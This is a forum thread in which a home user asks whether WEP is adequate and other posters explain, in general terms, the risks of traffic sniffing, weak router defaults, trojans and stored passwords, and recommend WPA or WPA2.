I've had set up WEP encryption in my home network for more than a
year. Only some days ago I gave WPA a try, just out of curiousity
and maybe to learn something out. The reason for me not doing it
before is that I don't feel as such a horrible thing if my
neighbour uses my internet connection to do some web surfing and
check mail, for instance.
Now, I read somewhere that the threat could be somebody gaining
access to my computer and therefore doing all sort of things with
it. I don't know whether to believe this. Wouldn't an attacker
still need my root/user password to get any further? I don't share
files between computers, could somebody still do something through
some open ports I have for some applications? Is there a reason to
be worried, beyond the less important case of an ocasional freeloader?
On Jun 11, 1:05 pm, Jose Rodriguez <josec.rodrig...@gmail.com> wrote:
> Hello
>
> I've had set up WEP encryption in my home network for more than a
> year. Only some days ago I gave WPA a try, just out of curiousity
> and maybe to learn something out. The reason for me not doing it
> before is that I don't feel as such a horrible thing if my
> neighbour uses my internet connection to do some web surfing and
> check mail, for instance.
>
> Now, I read somewhere that the threat could be somebody gaining
> access to my computer and therefore doing all sort of things with
> it. I don't know whether to believe this. Wouldn't an attacker
> still need my root/user password to get any further? I don't share
> files between computers, could somebody still do something through
> some open ports I have for some applications?
Bingo! You hit it. And if a NAT f/w prevents hosts "out there" from
accessing such ip/port, like with properly secured access, you've
removed one threat dimension.
Your ISP may not be thrilled if you're providing neighborhood
hot-spot, either.
J
>Is there a reason to
> be worried, beyond the less important case of an ocasional freeloader?
>
> Regards
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>I've had set up WEP encryption in my home network for more than a
>year. Only some days ago I gave WPA a try, just out of curiousity
>and maybe to learn something out. The reason for me not doing it
>before is that I don't feel as such a horrible thing if my
>neighbour uses my internet connection to do some web surfing and
>check mail, for instance.
Right. Now how would you know if your neighbor is using your system?
How would you know that they're using it to surf the web, and not to
hack into your system, or to spew spam? Got any monitoring in place?
>Now, I read somewhere that the threat could be somebody gaining
>access to my computer and therefore doing all sort of things with
>it.
Not really. All they want is enough information to pull off an
identity theft. They don't need to hack into your machine to do that.
Simply sniffing yout traffic and extracting your unencrypted email is
usually sufficient. The only thing that's stopping someone is your
WEP encryption, which can be cracked in a few minutes. Note that they
don't need to enter your network or dig through your computer, just
sniff the traffic.
>I don't know whether to believe this.
Mostly true. I determined hacker could enter your computer via the
wireless and pull out some emailed bank statements, credit card
payment statements, saved passwords, and whatever else looks
interesting. At wireless speeds, they could copy most of the junk
under My Documents and various email depositories fairly quickly, and
inspect them at their liesure. Meanwhile, they could leave you with a
virus, not be cause they're malevolent, but simply to distract you.
>Wouldn't an attacker
>still need my root/user password to get any further?
They would need some way to get past your NAT and firewall. That's
not a trivial exercise. However MS makes it easier by punching holes
in the firewall with UPnP. Other applications add additional holes in
the firewall until it looks like Swiss cheeze. Remote control and
tech support applications are a fair candidate for an external attack.
However, that's usually too sloppy and too much work. It's much
easier to trick you into installing some remote control software on
your machine, and then taking over control from the outside. Those
are called Trojan Horse programs and are the basis of most of the
"BotNet" systems that are spewing spam and precipitating DDOS attacks.
If someone can get you to install or run one of these apps, using
"social engineering", there's no need for them to try to get past your
firewall.
>I don't share
>files between computers, could somebody still do something through
>some open ports I have for some applications?
Oh yes, but it would usually require a security vulnerability in some
application that uses that open port to take advantage of it. There
are plenty such vulnerabilities out there, but they usually get
patched and fixed fairly quickly. However, the trojan horse problem
doesn't require a buggy application and will work quite nicely on a
perfectly functional computah.
>Is there a reason to
>be worried, beyond the less important case of an ocasional freeloader?
Yes. The real worry is someone sniffing your traffic and pulling off
an identity theft. That's why you need and should use WPA or WPA2.
Jeff Liebermann wrote:
> Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>> [...]I don't feel as such a horrible thing if my
>> neighbour uses my internet connection to do some web surfing and
>> check mail, for instance.
>
> Right. Now how would you know if your neighbor is using your system?
> How would you know that they're using it to surf the web, and not to
> hack into your system, or to spew spam? Got any monitoring in place?
>
You're right, and I've been pointed out another problem, what if
somebody is using your system with illegal purposes you might end
getting the blame for? (although it would be quite stupid using
next door conection to download child pornography, but who knows).
>> Now, I read somewhere that the threat could be somebody gaining
>> access to my computer and therefore doing all sort of things with
>> it.
>
> Not really. All they want is enough information to pull off an
> identity theft. They don't need to hack into your machine to do that.
> Simply sniffing yout traffic and extracting your unencrypted email is
> usually sufficient. The only thing that's stopping someone is your
> WEP encryption, which can be cracked in a few minutes. Note that they
> don't need to enter your network or dig through your computer, just
> sniff the traffic.
>
I haven't thought about that, it is worrying.
>> I don't know whether to believe this.
>
> Mostly true. I determined hacker could enter your computer via the
> wireless and pull out some emailed bank statements, credit card
> payment statements, saved passwords, and whatever else looks
> interesting. At wireless speeds, they could copy most of the junk
> under My Documents and various email depositories fairly quickly, and
> inspect them at their liesure. Meanwhile, they could leave you with a
> virus, not be cause they're malevolent, but simply to distract you.
>
That's serious, but for that to work you have to leave things
opened and clear; I would only store passwords in an encrypted
format and a rather obscure location. And at least online banking
is made through a secure conection, isn't it?
>> Wouldn't an attacker
>> still need my root/user password to get any further?
>
> They would need some way to get past your NAT and firewall. That's
> not a trivial exercise. However MS makes it easier by punching holes
> in the firewall with UPnP. Other applications add additional holes in
> the firewall until it looks like Swiss cheeze. Remote control and
> tech support applications are a fair candidate for an external attack.
>
> However, that's usually too sloppy and too much work. It's much
> easier to trick you into installing some remote control software on
> your machine, and then taking over control from the outside. Those
> are called Trojan Horse programs and are the basis of most of the
> "BotNet" systems that are spewing spam and precipitating DDOS attacks.
> If someone can get you to install or run one of these apps, using
> "social engineering", there's no need for them to try to get past your
> firewall.
I guess that's one of the reasons why Linux is inherently more
secure than Windows--software comes from digitally signed, official
repositories, for instance. On the other hand, I still have to
worry about things like remote registry, UPnP, remote assistance,
server service, etc for my partner runs Vista...so boring doing
these things.
>
>> I don't share
>> files between computers, could somebody still do something through
>> some open ports I have for some applications?
>
> Oh yes, but it would usually require a security vulnerability in some
> application that uses that open port to take advantage of it. There
> are plenty such vulnerabilities out there, but they usually get
> patched and fixed fairly quickly. However, the trojan horse problem
> doesn't require a buggy application and will work quite nicely on a
> perfectly functional computah.
After this and some other posts in other list I believe I get the
idea of the open ports thing. I just didn't get how would it be
possible to pass through something it was not intended to do so.
>
>> Is there a reason to
>> be worried, beyond the less important case of an ocasional freeloader?
>
> Yes. The real worry is someone sniffing your traffic and pulling off
> an identity theft. That's why you need and should use WPA or WPA2.
Well, I'm convinced, I'll stuck with my WPA2 thing, making sure the
password is strong enough.
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>You're right, and I've been pointed out another problem, what if
>somebody is using your system with illegal purposes you might end
>getting the blame for?
It's possible, but (to the best of my knowledge) it hasn't happened
yet. There have been some arrests and stupid convictions for using a
wireless connection without permission, but none for anything
involving liability. The whole issue of responsibility for wireless
security is currently unclear and I am NOT an expert or attorney.
However, I suggest you do whatever it takes to not become a test case.
>> Mostly true. I determined hacker could enter your computer via the
>> wireless and pull out some emailed bank statements, credit card
>> payment statements, saved passwords, and whatever else looks
>> interesting. At wireless speeds, they could copy most of the junk
>> under My Documents and various email depositories fairly quickly, and
>> inspect them at their liesure. Meanwhile, they could leave you with a
>> virus, not be cause they're malevolent, but simply to distract you.
>>
>That's serious, but for that to work you have to leave things
>opened and clear; I would only store passwords in an encrypted
>format and a rather obscure location. And at least online banking
>is made through a secure conection, isn't it?
There are multiple levels of protection. The most obvious is to
encrypt the wireless traffic so that nobody enters you LAN in the
first place. That's the WPA and WPA2 encrytion.
However, if someone can enter via wireless, what other defenses do you
have? If you have shared folders, are they open to anyone to read or
are they password protected? Do you have intrusion detection software
running? Do you use encrypted folders (XP Pro only)? Are the
documents themselves encrypted? Can they be copied, even if they are
encrypted?
The last is fairly important. Most people assume that a document with
simple encrytion is safe. That really depends on the level of
encryption and the time allowed. The encryption used may be
relatively secure if I had a limited amount of time to recover the
key. However, if I can copy the encrypted file to my own machine, I
can do a brute force or better crack at my liesure. That would
require a more secure system. I've also found that most users tend to
use the same password for ALL their encrypted documents, so cracking
one will usually crack them all. Note the number of "password
recovery" programs and services available:
<http://www.crackpassword.com>
<http://www.lostpassword.com>
etc.
My personal solution is to NOT store anything of value on the machine.
The really important stuff is on a removeable USB thumb drive. It's
also encrypted, password protected, and backed up with a copy
somewhere. Not ideal, but with the whole neighborhood on my
neighborhood wireless LAN, it's prudent.
>I guess that's one of the reasons why Linux is inherently more
>secure than Windows--software comes from digitally signed, official
>repositories, for instance.
Nope. There are distributions that come that way, but most of the
stuff I run isn't. The stuff I've seen that is signed, is self
authenticating and does not use an independent certificate authority.
Therefore, it could be forged. Improbable, but possible.
The major difference between Linux and Windoze security is philosophy.
Linux usually comes secure by default with all the security features
enabled on installation. If you want to do something disgusting, then
you have to do it intentionally. Windoze is built for user
convenience and requires the user to impliment and apply security. At
least that's the way they started. Both extremes found that they had
to compromise somewhat in order to make their products usable. Linux
is becoming more permissive on instalation and Windoze at least
impliments basic password security on installation. Since there's no
"right answer", the issue will continue to be a moving target. Also,
just because the vendor delivers a product that's more convenient than
secure, doesn't mean you have to perpetuate the mistake.
Unfortunately, the wireless router industry has done the worst
possible thing. Most wireless routers are wide open and totally
insecure on installation. Open the box, plug it in, and in most
cases, it will function. That's a great OBE (out of box experience)
but doesn't make for a very secure system. Eventually, someone will
sue a wireless router manufacturer for damaged resulting from the
false perception of security, and things might change. Meanwhile,
only 2-wire has gotten the clue and delivers their routers secure by
default. Again, just because the router manufacturers deliver
insecure products, doesn't mean that you have to perpetuate the
mistake.
Jeff Liebermann wrote:
> Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>>> [...] [A] determined hacker could enter your computer via the
>>> wireless and pull out some emailed bank statements, credit card
>>> payment statements, saved passwords, and whatever else looks
>>> interesting. At wireless speeds, they could copy most of the junk
>>> under My Documents and various email depositories fairly quickly, and
>>> inspect them at their liesure. [...]
>>>
>> That's serious, but for that to work you have to leave things
>> opened and clear; I would only store passwords in an encrypted
>> format and a rather obscure location. And at least online banking
>> is made through a secure conection, isn't it?
>
> There are multiple levels of protection. The most obvious is to
> encrypt the wireless traffic so that nobody enters you LAN in the
> first place. That's the WPA and WPA2 encrytion.
>
> However, if someone can enter via wireless, what other defenses do you
> have? If you have shared folders, are they open to anyone to read or
> are they password protected? Do you have intrusion detection software
> running? Do you use encrypted folders (XP Pro only)? Are the
> documents themselves encrypted? Can they be copied, even if they are
> encrypted?
>
> The last is fairly important. Most people assume that a document with
> simple encrytion is safe. That really depends on the level of
> encryption and the time allowed. The encryption used may be
> relatively secure if I had a limited amount of time to recover the
> key. However, if I can copy the encrypted file to my own machine, I
> can do a brute force or better crack at my liesure. That would
> require a more secure system. I've also found that most users tend to
> use the same password for ALL their encrypted documents, so cracking
> one will usually crack them all. Note the number of "password
> recovery" programs and services available:
> <http://www.crackpassword.com>
> <http://www.lostpassword.com>
> etc.
>
> My personal solution is to NOT store anything of value on the machine.
> The really important stuff is on a removeable USB thumb drive. It's
> also encrypted, password protected, and backed up with a copy
> somewhere. Not ideal, but with the whole neighborhood on my
> neighborhood wireless LAN, it's prudent.
I totally agree, when I said "I would" I meant exactly that, i.e.
that I would do it that way if I had to. An online banking password
stored in your computer is probably a way of looking for potential
trouble. On the other hand, being realistic, I don't think that
anybody would scan my hard drive to afterwards do a brute force
attack on some suspiciously encrypted strings of text trying to
find out whether they find anything interesting--unless they were
pretty sure that they could find it, which it's not obviously the
case for I am not (and I don't look like) a very wealthy person.
Applying the same reasoning, I don't hold (and I don't look like
doing so) any extra important and sensitive information somebody
could make any profit out of it. Let's face it, for average
Joe--like myself--some of the precautions out there available are
overkilling. The same, obviously, does not apply to the corporate
world, and knowing how to protect your digital data is, in any
case, highly recommendable.
>
>> I guess that's one of the reasons why Linux is inherently more
>> secure than Windows--software comes from digitally signed, official
>> repositories, for instance.
>
> Nope. There are distributions that come that way, but most of the
> stuff I run isn't. The stuff I've seen that is signed, is self
> authenticating and does not use an independent certificate authority.
> Therefore, it could be forged. Improbable, but possible.
A similar issue arose in other list when somebody asked how
reliable, in terms of security, can SE Linux possibly be, given
that it was first developed by the NSA. I agree with some of the
opinions given there in that, at the end of the day, you will
always have to rely in somebody unless you develop your own OS and
your own software--and you don't connect to the internet unless you
have your own ISP business, FWIW. I don't know what you run, but
there is a qualitative difference between installing something that
came from an official signed repository (yes, you have to rely in,
say, Debian developers) and running the last supercool screensaver
or useless utility (as many windows users do, not to talk about
warez). Another point is the difference between open source vs
closed one. I'll give you an example: some time ago I downloaded
and installed VMWare and it all went fine, but I found the
advertising mail they used to send me somewhat annoying. At some
point I installed Samba to share files between my Linux and my
virtual XP machine, with the consequence of receiving an e-mail
inmediately afterwards selling me the goodness of VMWare products
connected through Samba servers...I may be seing ghosts here, I
don't know.
>
> The major difference between Linux and Windoze security is philosophy.
> Linux usually comes secure by default with all the security features
> enabled on installation. If you want to do something disgusting, then
> you have to do it intentionally. Windoze is built for user
> convenience and requires the user to impliment and apply security. At
> least that's the way they started. Both extremes found that they had
> to compromise somewhat in order to make their products usable. Linux
> is becoming more permissive on instalation and Windoze at least
> impliments basic password security on installation. Since there's no
> "right answer", the issue will continue to be a moving target. Also,
> just because the vendor delivers a product that's more convenient than
> secure, doesn't mean you have to perpetuate the mistake.
>
Spot on, I guess, but how many users don't do anything about
anything with their systems? I myself, when on windows used to
close down everything I could to avoid potential risks, as well as
keeping a bare minimum set of security standards like setting
separate unprivileged accounts, firewall, antivirus, antispyware
and so on, and yet didn't bother to set up WPA till a couple of
weeks ago out of pure lazyness and ignorance.
> Unfortunately, the wireless router industry has done the worst
> possible thing. Most wireless routers are wide open and totally
> insecure on installation. Open the box, plug it in, and in most
> cases, it will function. That's a great OBE (out of box experience)
> but doesn't make for a very secure system. Eventually, someone will
> sue a wireless router manufacturer for damaged resulting from the
> false perception of security, and things might change. Meanwhile,
> only 2-wire has gotten the clue and delivers their routers secure by
> default. Again, just because the router manufacturers deliver
> insecure products, doesn't mean that you have to perpetuate the
> mistake.
>
One terrific example of worse case scenario I know of has place in
Spain. Company X sells this nice wireless routers that provides
with their internet package. User Y believes he's safe because it
came with encryption, and that sounds cool. What Y probably does
not know is that the default ssid of every X router is something
like "WLAN ZW", being ZW, if I remember correctly, the last two
digits of the router's MAC address, and being the WEP key a
combination of the ssid and the whole MAC. Forget about injecting,
deauth, statistical attacks whatsoever: one single data packet
gathered gives you the key after an extremely quick dictionary
search. I'd be quite angry if I was with company X.
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>On the other hand, being realistic, I don't think that
>anybody would scan my hard drive to afterwards do a brute force
>attack on some suspiciously encrypted strings of text trying to
>find out whether they find anything interesting
True. That takes too long. Just grab the Firefox or IE stored
passwords. That's where all the goodies are usually buried. Got a
bank account password saved in there?
<http://www.securityfocus.com/infocus/1882>
<http://www.securityfocus.com/infocus/1883>
>A similar issue arose in other list when somebody asked how
>reliable, in terms of security, can SE Linux possibly be, given
>that it was first developed by the NSA.
I would be happy just to have a CRC on the distribution so that I know
that it has been modified. Many large distributions do that, but
usually to determine if there's been download corruption, not as a
security check.
>point I installed Samba to share files between my Linux and my
>virtual XP machine, with the consequence of receiving an e-mail
>inmediately afterwards selling me the goodness of VMWare products
>connected through Samba servers...I may be seing ghosts here, I
>don't know.
It's probably true, but I'm too lazy to check the VMWare privacy
policy. My guess is that they you have signed away some right for
them to obtain a list of installed applications in order to improve
their product quality. The road to hell is paved with the best of
intentions.
>Spot on, I guess, but how many users don't do anything about
>anything with their systems?
Shhhhsh. Don't tell anyone. That kind of user supplies the bulk of
my business. If they ever understood that they are personally
responsible for security, and not Microsoft, I would be out of
business. The company motto is "If this stuff worked, you wouldn't
need me".
>I myself, when on windows used to
>close down everything I could to avoid potential risks, as well as
>keeping a bare minimum set of security standards like setting
>separate unprivileged accounts, firewall, antivirus, antispyware
>and so on, and yet didn't bother to set up WPA till a couple of
>weeks ago out of pure lazyness and ignorance.
Not me. I download, install, tinker, and often break just about
anything I find that's interesting. If it blows up, I restore with
various tools (ERUNT, system restore, DVD backup, etc). I want to
have things break on my machine before I inflict them on my customers.
Also, it adds to my experience level, which gives me a few days lead
time on the inevitable questions from customers.
The one exception is my office bookkeeping machine. It's almost
totally isolated from the rest of the LAN and WAN. It does connect to
the internet for updates, but only briefly. I have mirrored backups,
encrypted filesystems, and secure access. If it goes, so does my
business, so I'm very careful with it.
>Forget about injecting,
>deauth, statistical attacks whatsoever: one single data packet
>gathered gives you the key after an extremely quick dictionary
>search. I'd be quite angry if I was with company X.
Lovely. Don't forget about "back door" passwords and multiple points
of entry. For example, one very secure router forgot to change the
SNMP passwords and left them at the defaults of public and private.
Turn on SNMP, and the router is wide open. I can even change the
admin password via SNMP. Fortunately, that's been fixed, but it took
well over a year to convince them to do it.
can they hack into my computer? 
Linear Mode
